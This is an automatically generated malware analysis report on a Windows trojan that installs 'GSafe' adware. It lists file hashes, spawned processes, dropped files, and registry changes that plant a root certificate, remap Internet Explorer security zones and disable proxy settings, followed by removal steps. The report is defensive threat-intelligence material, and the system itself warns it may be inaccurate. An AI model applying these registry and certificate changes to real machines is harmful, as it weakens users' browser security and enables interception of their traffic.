Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: b6f079be120993d11a08a472b4e42c9d
SHA1: 87a9b9d5ba403571e0b5f118d1d40b5622516757
SHA256: d27673e5a6b4e58f900786526bb49290148c6cccdb9dc030cf867822fe97be9d
SSDeep: 768:s1cVhpQI2EQK0iPDh84nScF15GYbWjXO3XJV552/K alin2eFzbng2ask84h:KQpQ5EP0ijnRTXJV5k/K Yi2eFfgb84h
Size: 51976 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nj_update.exe:1544
GSafe.exe:832
GSafe.exe:1596
net1.exe:540
net1.exe:440
net1.exe:1100
net.exe:1236
net.exe:484
net.exe:240
%original file name%.exe:1244
gsafe_setup.exe:1800
The Trojan injects its code into the following process(es):
GSafe.exe:1268
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process nj_update.exe:1544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\nsx85.tmp (1568 bytes)
%WinDir%\Temp\nsx86.tmp\UserInfo.dll (4 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\nsh84.tmp (0 bytes)
%WinDir%\Temp\nsx86.tmp\UserInfo.dll (0 bytes)
%WinDir%\Temp\nsx86.tmp (0 bytes)
The process GSafe.exe:832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\update[1].php (44 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\gsafe_update[1] (22973 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\hdtv_rules[1].htm (80 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.pvk (1 bytes)
%WinDir%\Temp\P_CheckUpdate.txt (44 bytes)
%WinDir%\Temp\P_RuleList.txt (80 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.cer (782 bytes)
%WinDir%\Temp\nj_update.exe (18319 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\P_CheckUpdate.txt (0 bytes)
%WinDir%\Temp\P_RuleList.txt (0 bytes)
The process GSafe.exe:1268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\hdtv_rules[1].htm (80 bytes)
%WinDir%\Temp\P_RuleList.txt (80 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\P_RuleList.txt (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\hdtv_rules[1].htm (0 bytes)
The process %original file name%.exe:1244 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\gsafe_setup[1].exe (135314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gsafe_setup.exe (135314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst7E.tmp (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDP3RRYS\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2VMDU78I\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y9G7U7CL\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd7D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\inetc.dll (0 bytes)
The process gsafe_setup.exe:1800 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (6360 bytes)
%System%\drivers\gfilterdrv.sys (55 bytes)
%Program Files%\GSafe\remove_GSafe.exe (1568 bytes)
%Program Files%\GSafe\ProtocolFilters.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\ns83.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy81.tmp (81025 bytes)
%Program Files%\GSafe\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\GSafeSSL.cer (782 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (784 bytes)
%Program Files%\GSafe\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\System.dll (11 bytes)
%Program Files%\GSafe\gfilterdrv.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\nsExec.dll (6 bytes)
%Program Files%\GSafe\nfapi.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\GSafe\libeay32.dll (35507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (12536 bytes)
%Program Files%\GSafe\GSafe.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (3312 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd80.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\GSafeSSL.cer (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\ns83.tmp (0 bytes)
%Program Files%\GSafe\gfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (0 bytes)
Registry activity
The process nj_update.exe:1544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 1B 5D 50 F7 21 67 4E 69 17 52 91 DD 15 22 8F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"DisplayVersion" = "1.1.0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\GSafe]
"Version" = "1.1.0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"
The process GSafe.exe:832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\GSafe]
"instid" = "2rLVemqiV8QPrfThkbebR75aYB35Y4gu"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Services\gfilterdrv]
"Tag" = "9"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A6FBE8F491681C4D381A094958E89BD8A84108E2]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 A6 FB E8 F4"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 3E 31 84 2A 84 10 E2 5C 3C 59 C1 19 5B B9 F8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"A6FBE8F491681C4D381A094958E89BD8A84108E2"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
The process GSafe.exe:1596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B A6 24 78 3F FD BB 27 9D D7 0A B8 EC 4A 3E 28"
The process GSafe.exe:1268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 44 6E 90 B5 D5 96 9C 44 4B 23 98 59 DA 4D 8A"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process net1.exe:540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC BA DB 8A F7 0E 7E 45 9D E7 10 84 79 54 4A EA"
The process net1.exe:440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 C8 CA 09 CA 0A D2 11 29 49 83 10 EA 71 6F A3"
The process net1.exe:1100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 85 54 67 57 69 7F 8E FE 87 C2 69 62 93 D2 E6"
The process net.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 8E 98 A6 22 0C 5D 90 AF 0E 8C 98 F3 F9 BF 43"
The process net.exe:484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 93 6B 55 C5 52 13 64 11 F7 B9 89 0D 3B 81 68"
The process net.exe:240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 2E FC B6 45 6C 20 A9 C0 64 F1 E2 42 4B 52 62"
The process %original file name%.exe:1244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 1E C6 BC 65 07 AD 98 6E B1 42 6D E4 D1 CF 96"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process gsafe_setup.exe:1800 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D D2 52 06 9D 60 9E 76 4B B4 AE 11 6C 9D 56 48"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\GSafe]
"affid" = "hdtv"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"Comments" = "Browse safe, securely and do your best searches online"
"UninstallString" = "%Program Files%\GSafe\remove_GSafe.exe /S"
"DisplayVersion" = "1.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"DisplayName" = "GSafe"
"QuietUninstallString" = "%Program Files%\GSafe\remove_GSafe.exe /S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"Publisher" = "GENCO LABS LLC"
[HKLM\SOFTWARE\GSafe]
"Version" = "1.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
| MD5 | File path |
|---|---|
| 0661995db9d56791723702f4ea94c5fb | c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\gsafe_update[1] |
| 3a0c5503294cd43c59df4279d2b72d8d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\gsafe_setup[1].exe |
| 1690feeae024a4584ea1d97c07dee78e | c:\Program Files\GSafe\GSafe.exe |
| 9155cce4d8c0daf7b4d4c1ada945ce54 | c:\Program Files\GSafe\ProtocolFilters.dll |
| 3e1176c39139baf084e9a69d6d50438a | c:\Program Files\GSafe\libeay32.dll |
| 9ff0b75dfb43d58f9d2ebe2697b529c4 | c:\Program Files\GSafe\nfapi.dll |
| 92a6df47283b49b207045fa7a4502bc1 | c:\Program Files\GSafe\nfregdrv.exe |
| bd67f6e7a304f684b3513b3a9c535143 | c:\Program Files\GSafe\remove_GSafe.exe |
| 4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files\GSafe\ssleay32.dll |
| 0661995db9d56791723702f4ea94c5fb | c:\WINDOWS\Temp\nj_update.exe |
| a4b60de83b790c9aa86a367eedc3af2a | c:\WINDOWS\system32\drivers\gfilterdrv.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nj_update.exe:1544
GSafe.exe:832
GSafe.exe:1596
net1.exe:540
net1.exe:440
net1.exe:1100
net.exe:1236
net.exe:484
net.exe:240
%original file name%.exe:1244
gsafe_setup.exe:1800 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\Temp\nsx85.tmp (1568 bytes)
%WinDir%\Temp\nsx86.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\update[1].php (44 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\gsafe_update[1] (22973 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\hdtv_rules[1].htm (80 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.pvk (1 bytes)
%WinDir%\Temp\P_CheckUpdate.txt (44 bytes)
%WinDir%\Temp\P_RuleList.txt (80 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.cer (782 bytes)
%WinDir%\Temp\nj_update.exe (18319 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\hdtv_rules[1].htm (80 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\gsafe_setup[1].exe (135314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gsafe_setup.exe (135314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst7E.tmp (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDP3RRYS\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2VMDU78I\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y9G7U7CL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (6360 bytes)
%System%\drivers\gfilterdrv.sys (55 bytes)
